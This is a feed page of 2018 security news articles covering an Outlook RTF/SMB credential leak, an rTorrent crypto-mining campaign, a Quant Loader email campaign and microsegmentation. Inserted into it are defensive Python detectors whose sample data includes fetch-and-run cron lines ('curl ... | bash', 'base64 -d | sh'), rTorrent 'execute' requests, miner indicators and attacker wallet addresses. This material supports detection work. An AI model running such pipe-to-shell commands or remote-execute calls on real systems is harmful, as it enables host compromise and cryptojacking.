STE WILLIAMS

Using Outlook? You should probably do some patching

Microsoft emitted a patch for all supported versions of Outlook on Patch Tuesday this month to prevent attackers harvesting credentials from users who simply preview a carefully crafted Rich Text (RTF) email.

The vulnerability (CVE-2018-0950) exploited Outlook’s unfortunate habit of retrieving remotely hosted Object Linking and Embedding (OLE) content when previewing an RTF email.

The Windows client would then authenticate itself to the host serving that content if it was an SMB/CIFS server.

If the SMB server was controlled by the attacker, then Windows had effectively handed over the user’s login credentials, including a hashed password, without any interaction on behalf of the user other than the email being rendered.

And let’s face it, most users generally are unlikely to have a particularly strong password, meaning that cracking the hash would not have presented a problem for a determined attacker.

Microsoft’s OLE technology was surely the gift that keeps on giving as far as hackers are concerned.

Will Dormann of CERT reported the issue on 29 November 2016 (yes, 2016) and it has taken Microsoft 18 months to deal with it.

Unfortunately, the fix didn’t entirely solve the problem. While it does stop Outlook from kicking off an SMB connection during preview, it does not cover the scenario of a user clicking on a link in the email itself. Such carefree clicking has the same potential impact as the original vulnerability.

To solve the issue in the absence of a more complete fix, Dormann recommended installing the patch (obviously) and then stopping inbound and outbound SMB connections at the network border by blocking ports 445/tcp, 137/tcp, 139/tcp, as well as 137/udp and 139/udp.

Dormann also suggested blocking NTLM SSO authentication. To be fair, Microsoft issued an advisory on this very thing in November 2017.

Dormann concluded with some common-sense security advice: “Assume that at some point your client system will attempt to make an SMB connection to an attacker’s server. For this reason, make sure that any Windows login has a sufficiently complex password so that it is resistant to cracking.”

He went on to recommend using a password manager to deal with all those symbols and numbers we should all be using in hard-to-crack and easy-to-forget passwords. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/12/outlook_patch_preview_bug/

GCHQ boss calls out Russia for ‘industrial scale disinformation’

GCHQ boss Jeremy Fleming has hailed the success of a cyber-offensive against ISIS last year and warned of the growing threat posed by Russia.

During a wide-ranging speech at the CyberUK conference in Manchester on Thursday morning, Fleming said a cyber operation last year had disrupted ISIS’s [Daesh] communications.


“GCHQ, in partnership with the Ministry of Defence, has conducted a major offensive cyber campaign against Daesh,” Fleming said.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield.”

“In 2017 there were times when Daesh found it almost impossible to spread their hate online, to use their normal channels to spread their rhetoric, or trust their publications,” he added.

Fleming said cyber is only one part of the wider international response, adding this is the “first time the UK has systematically and persistently degraded an adversary’s online efforts as part of a wider military campaign”.

Fleming hinted similar tactics, now proven, might be used against other (unnamed) potential aggressors. “It worked against Daesh and it can work against other national security challenges too,” he said.

Options go beyond simple denial of service to operations that “perhaps even destroy equipment or networks”, but this would only be done in accordance with international law and proportionate to the threats posed, he said. Fleming made no mention of using signals intelligence to direct drone strikes by tracking terrorists’ phones, tactics which were previously reported to have been used in operations against high-profile jihadis.

During his first public speech, the GCHQ director also spoke at length about the heightened threat posed by an “old foe”, Russia.

The Kremlin is “blurring the boundaries between criminal and state activity” and not playing by international norms, Fleming told delegates. This goes beyond the nerve agent attack against Sergei Skripal and his daughter in Salisbury, blamed by UK authorities on Russia, that has resulted in a diplomatic crisis and the worsening of Anglo-Soviet relations.

“Whether that’s NotPetya against the Ukraine’s financial, energy and government sectors, which eventually spread across the world, or the use of industrial scale disinformation to sway public opinion – they’re not playing to the same rules,” he said.

The UK has collected evidence on Russia for around two decades, monitoring a growing cyber threat, said Fleming. GCHQ’s expertise is likely to be in increasing demand, he added.

Earlier this week GCHQ announced plans to open a new GCHQ site in Manchester, creating hundreds of jobs in the process. The new site, to be opened next year, will work with GCHQ’s main base in Cheltenham and existing satellite offices in Bude, Cornwall and Scarborough, Yorkshire in delivering on GCHQ’s overall mission.

“Criminals and hostile states are ‘early adopters’ of tech so the authorities must combat that threat to maintain a ‘safer digital Britain’,” Fleming said.

“Hostile states, terrorists and criminals are emboldened and assisted by technology. They’re early adopters of new products and services, investing heavily in strategies and tactics to further their causes.”

Recruitment is a key challenge and GCHQ is developing a strategy to manage the cyber skills gap.

“We need to offer more flexible careers, where individuals can more easily work at lower levels of classification, can pursue their interests in the private sector and can bring the best of that back into GCHQ,” Fleming claimed.

“This means changing the perception of a career in the intelligence community so that more men and women from every part of society can imagine themselves thriving in the intelligence and security world.

“Yes, for some of our roles we’ll continue to need those with a Doctorate in Mathematics or Computer Science, but we also need people straight from school or those who want a career change. People who can lead and make decisions,” he concluded.

Bootnote

During his speech Fleming made no mention of cryptography aside from a single reference to cryptocurrencies in the context of ransomware. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/04/12/gchq_boss_cyberuk/

How Attackers Can Exploit rTorrent with Monero Cryptocurrency Miner


As cryptomining campaigns become more profitable, cybercriminals are becoming more creative about finding new ways to extend their operations.

rTorrent is a Unix-based torrent client that is implemented in C++. rTorrent optionally supports XML-RPC to allow control by other external programs. XML-RPC is a remote procedure call (RPC) protocol that uses XML to encode its calls and HTTP as a transport mechanism. ruTorrent is an example of a web-based front-end that controls the rTorrent client using XML-RPC communication.

Unlike communicating with the uTorrent client, the rTorrent client doesn’t require any authentication and supports a method for direct shell command execution. While this functionality was not meant to be publicly accessible, some threat actors decided to test their luck on the Internet by looking for misconfigured rTorrent clients exposed to the web.

The campaign spotted by F5 researchers consists of two steps: reconnaissance and exploitation. The reconnaissance is performed using POST requests to an XML-RPC endpoint. The attacker tries to invoke the “download_list” method (provides the list of downloaded torrents) as an indication of an installed rTorrent client.

The request is sent to the “/RPC2” URL (as would be the case for common XML-RPC communication) but the endpoint URL is defined by the torrent client user in the web server configuration and could be configured to other values.

If there is a running rTorrent instance, it responds with a “200 OK” status code, and a list of hashes of the download list files. Then, once the result is positive, the attacker initiates the exploitation by sending another POST request that calls the “execute” method, which allows the attacker to run arbitrary shell commands on the host.
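The reconnaissance-then-exploitation sequence above is easy to police at the only place an rTorrent XML-RPC socket should ever be reachable from, the local host. The following is an added example for this page, not F5’s or the rTorrent project’s code: it assumes a reverse proxy or WAF hook that hands it the raw POST body and the client address, and it uses the two method names the article reports (“download_list” for the probe, “execute” for shell execution) plus the standard XML-RPC “system.multicall” batching call, which it unwraps so a shell method cannot hide inside a batch. The read-only allowlist is an assumed policy.

```python
"""Inspect XML-RPC requests aimed at an rTorrent endpoint before they reach it.

Added example for this article, not code from F5 or the rTorrent project.
Assumes a reverse proxy or WAF hook supplies the raw POST body and client IP;
the allowlist of harmless method names is an assumed policy.
"""
import ipaddress
import xml.etree.ElementTree as ET

# Method names from the article: "download_list" is the reconnaissance probe,
# "execute" runs arbitrary shell commands.  "system.multicall" is the standard
# XML-RPC batching call, which can wrap other methods.
SHELL_METHODS = {"execute"}
READ_ONLY_ALLOWLIST = {"download_list", "system.listMethods"}  # assumed policy


def xmlrpc_method_names(body):
    """Return every method name a request would invoke.

    Nested methods inside a system.multicall are included, so a shell method
    cannot hide behind the batching wrapper.
    """
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not an XML-RPC methodCall")
    top = (root.findtext("methodName") or "").strip()
    names = [top]
    if top == "system.multicall":
        # Each nested call is a <struct> with a member named "methodName".
        for member in root.iter("member"):
            if (member.findtext("name") or "").strip() == "methodName":
                value = member.find("value")
                inner = "".join(value.itertext()).strip() if value is not None else ""
                if inner:
                    names.append(inner)
    return names


def classify(body, client_ip):
    """Decide whether a request may pass.  Returns (verdict, reason)."""
    if not ipaddress.ip_address(client_ip).is_loopback:
        # The article's mitigation: the RPC socket should never be reachable
        # from outside the host.
        return "deny", "XML-RPC request from non-loopback client %s" % client_ip
    try:
        names = xmlrpc_method_names(body)
    except (ET.ParseError, ValueError):
        return "deny", "malformed XML-RPC body"
    for name in names:
        if name in SHELL_METHODS:
            return "deny", "shell execution method %r" % name
    unknown = [n for n in names if n not in READ_ONLY_ALLOWLIST and n != "system.multicall"]
    if unknown:
        return "deny", "method not on allowlist: %s" % ", ".join(unknown)
    return "allow", "read-only methods only"


# Constructed sample requests (shapes only, not captured traffic).
RECON_REQUEST = (
    b'<?xml version="1.0"?><methodCall><methodName>download_list</methodName>'
    b'<params><param><value><string></string></value></param></params></methodCall>'
)
EXEC_REQUEST = (
    b'<?xml version="1.0"?><methodCall><methodName>execute</methodName>'
    b'<params><param><value><string>placeholder-command</string></value></param>'
    b'</params></methodCall>'
)
MULTICALL_REQUEST = (
    b'<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>'
    b'<params><param><value><array><data><value><struct>'
    b'<member><name>methodName</name><value><string>execute</string></value></member>'
    b'<member><name>params</name><value><array><data/></array></value></member>'
    b'</struct></value></data></array></value></param></params></methodCall>'
)

if __name__ == "__main__":
    for label, body in [("recon", RECON_REQUEST), ("exec", EXEC_REQUEST),
                        ("multicall", MULTICALL_REQUEST)]:
        print(label, "from 127.0.0.1 ->", classify(body, "127.0.0.1"))
    print("recon from 203.0.113.5 ->", classify(RECON_REQUEST, "203.0.113.5"))
```

The client-address check comes first on purpose: a probe arriving from anywhere but loopback already means the socket is bound more widely than the article’s advice allows, regardless of which method it names.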

Payload Analysis
The attacker executes the bash (Unix shell) command with a base64 encoded payload. The payload is decoded using a Unix built-in base64 command and is executed by piping it to another bash to create a crontab task executed every hour. The task downloads a file from the attacker’s server and pipes its content directly to bash, which results in the execution of the script without saving it on the hard drive.

The bash script sets up some environment variables and prevents logging of any output from the running script. It also changes the memory page’s size to 128, likely to increase the performance of the mining process.

Removing Competitors
The script tries to stop other miners from running (competitors or older versions of its own miners) if they are present. It has quite a comprehensive list of miner process identifiers, from common miner program names like “miner” and “xmr” to specific file names such as “wnTKYg”, “imWBR” and “ddg” that are related to another mining campaign. It also searches for common miner program arguments such as “stratum” (a mining protocol) and for miners that pretend to be an SSH daemon (for example, sshd).
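The two sections above (Payload Analysis and Removing Competitors) describe traces a defender can hunt for on a Unix host: a cron entry that fetches a script and pipes it straight into a shell, and miner processes matching the very indicators the script uses to kill its rivals. The following is an added example for this page, not F5’s analysis code: it scans crontab lines and `ps aux`-style output using the process names and arguments quoted in the article. The sample lines are constructed, and the rule that an sshd not launched from /usr/sbin is suspicious is an assumed heuristic.

```python
"""Hunt for the host-level traces the article describes: a cron entry that
pipes a download straight into a shell, and miner processes matching the
process-name and argument indicators the script itself kills.

Added example, not F5's analysis code.  Sample crontab and ps lines are
constructed; the "sshd outside /usr/sbin" rule is an assumed heuristic.
"""
import os
import re

# Indicators quoted in the article: exact process names first, then
# substrings matched against the whole command line.
MINER_PROCESS_NAMES = {"wnTKYg", "imWBR", "ddg"}
MINER_SUBSTRINGS = ("miner", "xmr", "stratum")

# "<downloader> ... | bash" or "... | base64 -d | sh": fetch-and-run with
# nothing written to disk.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
DECODE_TO_SHELL = re.compile(r"\bbase64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")


def scan_crontab(lines):
    """Return [(schedule, command, reason)] for suspicious crontab entries."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # comments and VAR=value assignments
        if line.startswith("@"):  # @hourly, @reboot and friends
            fields = line.split(None, 1)
            if len(fields) < 2:
                continue
            schedule, command = fields
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        if PIPE_TO_SHELL.search(command):
            findings.append((schedule, command, "downloads and pipes to a shell"))
        elif DECODE_TO_SHELL.search(command):
            findings.append((schedule, command, "base64-decodes into a shell"))
    return findings


def scan_processes(ps_lines):
    """Return {pid: [reasons]} for `ps aux`-style lines matching miner indicators."""
    hits = {}
    for line in ps_lines[1:]:  # skip the header row
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue
        pid, cmdline = parts[1], parts[10]
        argv0 = cmdline.split()[0]
        base = os.path.basename(argv0)
        reasons = []
        if base in MINER_PROCESS_NAMES:
            reasons.append("known miner file name %s" % base)
        for needle in MINER_SUBSTRINGS:
            if needle in cmdline.lower():
                reasons.append("command line contains %r" % needle)
        if base == "sshd" and argv0 != "/usr/sbin/sshd":
            reasons.append("sshd not launched from /usr/sbin (assumed heuristic)")
        if reasons:
            hits[pid] = reasons
    return hits


# Constructed samples; the host and URL are placeholders, not real indicators.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    'MAILTO=""',
    "0 * * * * curl -fsSL http://203.0.113.20/placeholder | bash",
    "30 2 * * * /usr/bin/certbot renew --quiet",
    "*/15 * * * * echo aGVsbG8= | base64 -d | sh",
]
SAMPLE_PS = [
    "USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND",
    "root 1234 0.0 0.1 72000 6400 ? Ss 10:00 0:00 /usr/sbin/sshd -D",
    "nobody 2345 98.7 3.2 512000 260000 ? Sl 10:05 45:12 /tmp/wnTKYg -o stratum+tcp://203.0.113.30:3333",
    "nobody 3456 95.0 2.9 480000 240000 ? Sl 10:06 40:01 /tmp/.x/sshd",
    "user 4567 0.1 0.5 120000 30000 pts/0 S+ 10:10 0:01 python3 app.py",
]

if __name__ == "__main__":
    for schedule, command, reason in scan_crontab(SAMPLE_CRONTAB):
        print("cron [%s] %s: %s" % (schedule, reason, command))
    for pid, reasons in scan_processes(SAMPLE_PS).items():
        print("pid %s: %s" % (pid, "; ".join(reasons)))
```

On a live host the same two functions can be fed `crontab -l` output for every user plus /etc/cron.d entries, and `ps aux` output, without changing the matching logic.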

Downloading Malware from the Hidden Network
The malware sleeps for random periods (likely an evasion technique) and then downloads the mining malware with the correct OS architecture (x64 or x32). Interestingly, the file is served from a Tor network using the Tor2Web “gateway” service to make detection and shutdown of the attacker’s website more difficult. Tor2Web allows Tor hidden services to be accessed from a standard browser without being connected to the Tor network. This technique has been used by attackers for several years.

Zealot Connection?
Looking more closely, the malware download request contains a custom user-agent header with the value “-”. Interestingly, the same unique user-agent was also used in the Zealot campaign, leading us to speculate that both campaigns are executed by the same threat actor.

The user-agent is a bit unique as attackers typically use a legitimate browser user-agent to better masquerade their traffic, or a user agent that includes a default HTTP library name (for example, “python-requests/2.18.4”). In this case, the user-agent doubles as a deception technique to trick researchers or scanners that access the server with their Internet browser or tool and get a “403 Forbidden” response instead of the real content. This technique is being used more frequently by sophisticated attackers nowadays.

The downloaded malware is a Monero (XMR) crypto-currency miner. Currently, the executable is barely detected by anti-virus agents. At the time of this writing, only 3 of 59 anti-virus agents detected it as malicious.

Mining Monero (XMR) Currency
The mining pool and Monero wallet addresses are present in the malware file’s strings.

The mining addresses are: 45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h

44Sqc2Zcgz7ROLQcGRXtFsMbwNQIX5HExWMxD9tfxXRDBBiu2pf2j6VhvjD6i7D8MLNYzn73efgxEIwfweVG626MIdl2uxC

Looking at the mining addresses, we can see that the attacker has gained approximately $3,900 from this campaign for one of the addresses. The attacker’s current hash rate will earn the attacker about $43 per day. Currently, the second address doesn’t have a balance.

As crypto-mining campaigns become more profitable than other cybercrime business models, attackers are becoming more creative and finding new ways to extend their operations. In this example, we are seeing crypto criminals moving into an interesting attack vector target: misconfigured BitTorrent clients. As a protection, rTorrent users are advised to make sure that their clients are not accepting connections from the outside world, and that the listening sockets are bound to the localhost. Or, better yet, avoid XML-RPC functionality that is not shipped with the default installation. It’s worth noting that the author of rTorrent explicitly recommends not using the RPC functionality over TCP sockets.



Article source: https://www.darkreading.com/partner-perspectives/f5/how-attackers-can-exploit-rtorrent-with-monero-cryptocurrency-miner/a/d-id/1331422?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Email Campaign Employs Malicious URLs

A new attack dropping the Quant Loader Trojan bypasses scanners and sandboxes.

When it comes to malware, email still reigns supreme as the delivery mechanism of choice. The reasoning is simple: It’s cheap, it’s easily spoofed, and recipients are accustomed to getting messages from various sources. That means when a new attack is found, there’s a good possibility that it will spread successfully.

Researchers at Barracuda Networks found, through analyzing attacks on its customer network, a new Quant Loader Trojan campaign using Samba shares as a mechanism – rather than the more common http:// protocol. The result could be a new wave of ransomware attempts, a new round of keystroke loggers, or worse.

The new campaign has similarities to the FlawedAmmyy RAT campaign identified by Proofpoint several weeks ago. In both campaigns, the file:// URL prefix is used to trigger a file download via either SMB protocol or Samba. According to Fleming Shi, senior vice president of advanced technology at Barracuda, this mechanism has several benefits to the attacker when compared to traditional Web downloads.

First, because the URL is malformed and doesn’t involve the http:// prefix, it isn’t flagged by many defense systems as malicious. “So when they actually analyzed the file, analyzed the behavior, they found it not malicious because the URL was not active,” Shi says. “At a later date they’ll activate the URL, do the secondary download, and launch the attack.”
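Both this campaign and the Outlook preview bug at the top of this page hinge on a link that makes a Windows client open an SMB connection: a file:// URL with a remote host, or a \\host\share UNC path. Because such links carry no http:// prefix, a mail filter that only extracts web URLs misses them. The following is an added example for this page, not Barracuda’s or Proofpoint’s code: it walks the text parts of an RFC 822 message, pulls out file:// and UNC references, and marks those pointing at external hosts for quarantine. The sample message is constructed, and “internal” is assumed to mean RFC 1918, loopback or link-local addresses, or a dotless (NetBIOS-style) host name.

```python
"""Flag e-mail links that would make a Windows client open an SMB connection:
file:// URLs with a remote host and \\host\share UNC paths.

Added example for this page, not Barracuda's or Proofpoint's code.  The
sample message is constructed, and "internal" is assumed to mean RFC 1918,
loopback or link-local addresses, or a dotless (NetBIOS-style) host name.
"""
import ipaddress
import re
from email import message_from_string, policy

FILE_URL = re.compile(r"file://([A-Za-z0-9][A-Za-z0-9.\-]*)(?=[/\\\s]|$)", re.I)
UNC_PATH = re.compile(r"(?<![\w\\])\\\\([A-Za-z0-9][A-Za-z0-9.\-]*)\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def is_internal_host(host):
    """Assumed policy: private/loopback/link-local IPs and dotless names are internal."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host
    return any(ip in net for net in INTERNAL_NETS)


def find_smb_references(text):
    """Return [{'kind', 'host', 'external'}] for every file:// URL or UNC path."""
    refs = []
    for kind, pattern in (("file-url", FILE_URL), ("unc-path", UNC_PATH)):
        for match in pattern.finditer(text):
            host = match.group(1)
            refs.append({"kind": kind, "host": host,
                         "external": not is_internal_host(host)})
    return refs


def scan_message(raw):
    """Scan every text part of an RFC 822 message for SMB-triggering links."""
    msg = message_from_string(raw, policy=policy.default)
    refs = []
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            refs.extend(find_smb_references(part.get_content()))
    return refs


def verdict(refs):
    """'quarantine' if any link points at an external SMB host, else 'deliver'."""
    return "quarantine" if any(r["external"] for r in refs) else "deliver"


# Constructed sample message; hosts are documentation/placeholder values.
SAMPLE_EMAIL = (
    "From: accounts@example.net\n"
    "To: user@example.com\n"
    "Subject: Invoice 2018-04\n"
    "Content-Type: text/plain; charset=utf-8\n"
    "\n"
    "Please review: file://203.0.113.10/share/invoice.doc\n"
    "Also on the intranet: \\\\fileserver\\public\\report.pdf\n"
    "Web copy: https://example.org/ok\n"
)

if __name__ == "__main__":
    found = scan_message(SAMPLE_EMAIL)
    for ref in found:
        print(ref)
    print("verdict:", verdict(found))
```

The external/internal split matters because UNC links to a genuine file server are routine in business mail; the filter only has to act on links that would carry the user’s NTLM credentials out of the network, which is exactly the traffic the border blocking recommended in the Outlook story is meant to stop.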

Quant Loader itself is a Trojan that can be used to distribute a variety of malware payloads, including ransomware and password stealers. It is sold on underground forums and allows the user to configure the payload(s) upon infection using a management panel.

Stephen Boyer, CTO and co-founder of Bitsight, says that it’s no wonder that criminals are still using email as a primary attack vector for malware. “I can send you a message without any previous relationship, or knowledge, or authentication scheme,” he says. “So that’s why it’s been so effective.”

In spite of the potential danger, email is still the most critical messaging form used by business, so there’s no real option that includes simply not looking at, opening, or responding to email.

This latest campaign has not limited itself to a single malware payload, Shi says, so it can’t be assumed to all be from a single source. In addition, he says there’s a characteristic of this campaign that made it especially interesting to researchers.

“We believe the sophistication in this is the ability to alter the packaging at a pretty rapid pace,” Shi says. “And also, this wasn’t just one day and they went away – they actually kept going.”

He says he and his team saw the campaign repeated over more than three weeks, with evidence of its evolution within that timeframe.

Unlike some recent malware outbreaks that have been geographically targeted, Shi says that this latest campaign has had targets all over the UK and North America. The one constant, he says, is English used as the language in the email, though that could easily be changed in future attacks.


Interop ITX 2018

Join Dark Reading LIVE for an intensive Security Pro Summit at Interop IT X and learn from the industry’s most knowledgeable IT security experts. Check out the agenda here. Register with Promo Code DR200 and save $200.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/attacks-breaches/new-email-campaign-employs-malicious-urls/d/d-id/1331521?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsegmentation: Strong Security in Small Packages

A deep dive into how organizations can effectively devise and implement microsegmentation in a software-defined networking data center.

Network segmentation is a best-practice strategy for reducing the attack surface of data center networks. Just as the watertight compartments in a ship should contain flooding if the hull is breached, segmentation isolates servers and systems into separate zones to contain intruders or malware, limiting the potential security risks and damage.

A lack of effective network segmentation has been cited as a contributing factor behind several major data breaches, from the 2013 attack on Target to the recent Equifax breach. But while segmentation enhances an organization’s security posture, it also adds complexity and costs — especially in traditional on-premises data centers.

In these hardware-based environments, creating internal zones usually means installing extra firewall appliances to police the traffic flows between zones, which is expensive and time consuming. As a result, segmentation in traditional data centers has usually been limited to creating only a handful of zones.

Microsegmentation Momentum
More recently, the move to virtualized data centers using software-defined networking (SDN) is driving adoption of internal network segmentation. SDN’s flexibility enables advanced, granular zoning where data center networks are divided into hundreds or thousands of microsegments. This offers levels of security that were previously prohibitively expensive and complicated to implement. It’s no surprise that ESG analyst Jon Oltsik last year reported that 68% of enterprises are using some form of software-based microsegmentation technology to limit lateral exploration of networks by hackers, and make it easier to protect their applications and data.

But while SDN makes segmentation far easier to achieve, implementing an effective microsegmentation strategy presents two key challenges: where to place the borders between the microsegments in the data center; and how to devise and manage the security policies for each of the segments in their network environment?

Network and application traffic in the data center will need to cross multiple segments’ security controls to enable the application to function. So, the policies at each control must allow this traffic or the application simply will not work. And the more segments a network has, the more complex these policies become if they are to be effective in supporting business applications while blocking illegitimate traffic.

Starting the Microsegmentation Process
These challenges can be addressed with the right approach. The starting point is to discover all the application flows within your data center. An efficient way of doing this is by using a discovery engine that can identify and group together those flows that have a logical connection to each other — such as those based on shared IP addresses, which indicates the flows that may support the same business application.

This information can be augmented with additional data, such as labels for device or application names that are relevant to the flows. This creates a complete map that identifies the flows, servers, and security devices within the data center that your business applications rely on to function correctly.

Setting Up Segment Borders
Using this map, you can create your segmentation scheme for deciding which servers and systems should be placed in which network segment. This is done by identifying and grouping together servers that support the same business intent or applications. These servers are likely to be in regular communication with each other — typically sharing similar data flows — and can be placed within the same segment to better facilitate their interaction.

Once the scheme is outlined, you can then choose the best places on the data center network to place the security filters (such as virtual firewalls or other security controls) and create secure borders between segments.

When placing a filtering device (or activating a virtualized microsegmentation technology) to create a border between segments, remember that some of your application traffic flows will need to cross that border. Those cross-border flows will need explicit policy rules to allow them; otherwise the flows will be blocked and the applications that rely on them will fail. Therefore, you need to establish exactly what will happen to the flows once those filters are introduced.

Policing the Borders
To establish if you need to add or change specific policy rules, and what those rules should be, examine the application flows that were identified in your initial discovery process, noting if a flow already passes through an existing security control. If a given application flow does not currently pass through any security control and you plan to create a new network segment, you need to know if the unfiltered flow might get blocked when that segment border is established. If it does get blocked by the new border, you will need to add a new, explicit policy rule in order to allow the application flow to cross it.

However, if a given flow is already being filtered by a security control, then there is usually no need to add another explicit rule for that flow when you start to segment your network. This process can be repeated until you’re satisfied that you have segmented your network to deliver the levels of separation and security that you need.
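The procedure laid out from Starting the Microsegmentation Process through Policing the Borders can be worked on a small flow set. The following is an added example for this page, not AlgoSec’s product logic: it groups discovered flows into application groups by shared IP address (the union-find step stands in for the discovery engine), applies a segment assignment, and lists the cross-border flows that need an explicit allow rule because no existing control already filters them. The flows, segment names and the single pre-existing control are all constructed.

```python
"""Work the article's segmentation steps on a small constructed flow set:
group discovered flows into applications by shared IP, apply a segment
scheme, then list the cross-border flows that need an explicit allow rule
because no existing control already filters them.

Added example, not AlgoSec's product logic; flows, segment assignments and
the one pre-existing control are all constructed.
"""
from collections import defaultdict


def group_flows(flows):
    """Connect flows that share an IP address (src or dst) into application groups."""
    parent = {}

    def find(x):
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    for src, dst, _port in flows:
        parent[find(src)] = find(dst)
    groups = defaultdict(list)
    for flow in flows:
        groups[find(flow[0])].append(flow)
    return sorted(groups.values(), key=len)


def cross_border_flows(flows, segment_of):
    """Flows whose endpoints land in different segments."""
    return [f for f in flows if segment_of[f[0]] != segment_of[f[1]]]


def rules_needed(flows, segment_of, existing_controls):
    """Explicit allow rules for cross-border flows not already covered by a control.

    existing_controls is a set of frozenset({seg_a, seg_b}) pairs between which
    a filtering device with policy for the flow is already in place.
    """
    rules = []
    for src, dst, port in cross_border_flows(flows, segment_of):
        border = frozenset({segment_of[src], segment_of[dst]})
        if border in existing_controls:
            continue  # already filtered, no new rule needed
        rules.append({"from": segment_of[src], "to": segment_of[dst],
                      "dst": dst, "port": port, "action": "allow"})
    return rules


# Constructed discovery output: (src_ip, dst_ip, dst_port).
FLOWS = [
    ("10.1.0.10", "10.2.0.20", 443),   # web tier -> app tier
    ("10.2.0.20", "10.3.0.30", 5432),  # app tier -> database
    ("10.1.0.10", "10.1.0.11", 8080),  # web -> web, same segment
    ("10.5.0.50", "10.6.0.60", 25),    # mail -> relay, already firewalled
]
SEGMENT_OF = {
    "10.1.0.10": "web", "10.1.0.11": "web", "10.2.0.20": "app",
    "10.3.0.30": "db", "10.5.0.50": "mail", "10.6.0.60": "relay",
}
EXISTING_CONTROLS = {frozenset({"mail", "relay"})}

if __name__ == "__main__":
    for group in group_flows(FLOWS):
        print("application group:", group)
    for rule in rules_needed(FLOWS, SEGMENT_OF, EXISTING_CONTROLS):
        print("add rule:", rule)
```

Running it shows the point of the article’s last two sections: the web-to-web flow needs nothing because it never crosses a border, the mail-to-relay flow needs nothing because a control already sits on that border, and only the two tier-crossing flows of the web application come out as rules to write before the new segment borders go live.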

Managing Holistically
Having deployed your microsegmentation scheme, your next step is to make sure that it works in harmony with the security across your network. Application traffic needs to flow seamlessly across your SDN, in on-premises and cloud environments, so it’s critical to confirm that your policies support this.

The most effective way to achieve this is with an automation solution that can holistically manage all the security controls in your SDN environment alongside your existing traditional on-premises firewalls. This will ensure that the security policies that underpin your segmentation strategy are consistently applied and managed across your entire network estate as well as centrally monitored, with any changes tracked for audit purposes.

Implementing microsegmentation requires careful planning and orchestration if it’s to be effective. But when done properly, microsegmentation delivers both a stronger security posture and greater business agility. Sometimes, good things really do come in small packages.

Editor’s note: Generic products referred to in this article are available from multiple vendors in the security industry.


Avishai Wool co-founded AlgoSec in 2004 and has served as its CTO since its inception. Prior to co-founding AlgoSec, he co-founded Lumeta Corporation in 2000 as a spin-out of Bell Labs, and was its Chief Scientist until 2002. At Lumeta, Dr. Wool was responsible for …

Article source: https://www.darkreading.com/perimeter/microsegmentation-strong-security-in-small-packages/a/d-id/1331434?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

ABRY Partners Buys SiteLock

Web site security firm SiteLock has been acquired by private equity firm ABRY Partners.

SiteLock, a website security company, announced today that it has been acquired by private equity firm ABRY Partners, which takes over from Unitedweb as the principal equity holder. Financial terms of the deal were not disclosed.

The suite of products and services provided by SiteLock include protection against malware, software vulnerabilities, and DDoS attacks, as well as PCI compliance support and content delivery networks.

Arizona-based SiteLock says that it protects more than 12 million websites globally. ABRY Partners currently manages over $5.0 billion of capital in their active funds.



Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/application-security/abry-partners-buys-sitelock/d/d-id/1331524?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Uber Agrees to New FTC Settlement Over 2016 Breach Disclosure

Uber has agreed to an updated settlement with the FTC after news of its massive 2016 data breach.

Uber has agreed to an expanded settlement with the Federal Trade Commission, which last year charged the ride-sharing company for deceiving customers with its privacy and data security practices. The new settlement takes into account Uber’s massive 2016 data breach.

In the original settlement, proposed in August 2017, the FTC reported Uber failed to live up to claims that it closely monitored employees’ access to rider and driver data, and that it implemented measures to secure personal data on third-party cloud servers.

The FTC later learned Uber had failed to disclose a significant breach of user data that occurred in 2016 while it was investigating this settlement. As a result, it has updated its complaint to note that Uber knew about the 2016 breach and paid the attackers $100,000 through a “bug bounty program” to keep quiet. The breach was disclosed a year after it occurred, in Nov. 2017.

In the new agreement, Uber is compelled to disclose future incidents involving consumer data and to submit all reports from required third-party audits of its privacy program. It must retain certain records related to bug bounty reports of flaws that could compromise users’ data. Uber could be subject to civil penalties if it fails to share future incidents with the FTC.




Article source: https://www.darkreading.com/attacks-breaches/uber-agrees-to-new-ftc-settlement-over-2016-breach-disclosure/d/d-id/1331525?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Death SWAT suspect tweets threats from jail using buggy inmate kiosk

A few things you might not want to do next time you’re in jail for an alleged SWATting that got a man killed: tweet that you’re an eGod …

…and threaten to SWAT someone’s ass.

The tweets came from the account of Tyler Barriss. The 25-year-old Los Angeles man is in a Kansas jail, awaiting trial over allegedly making a bogus emergency call that led to the fatal police shooting of 28-year-old Andrew Finch in Wichita, Kansas on 28 December.

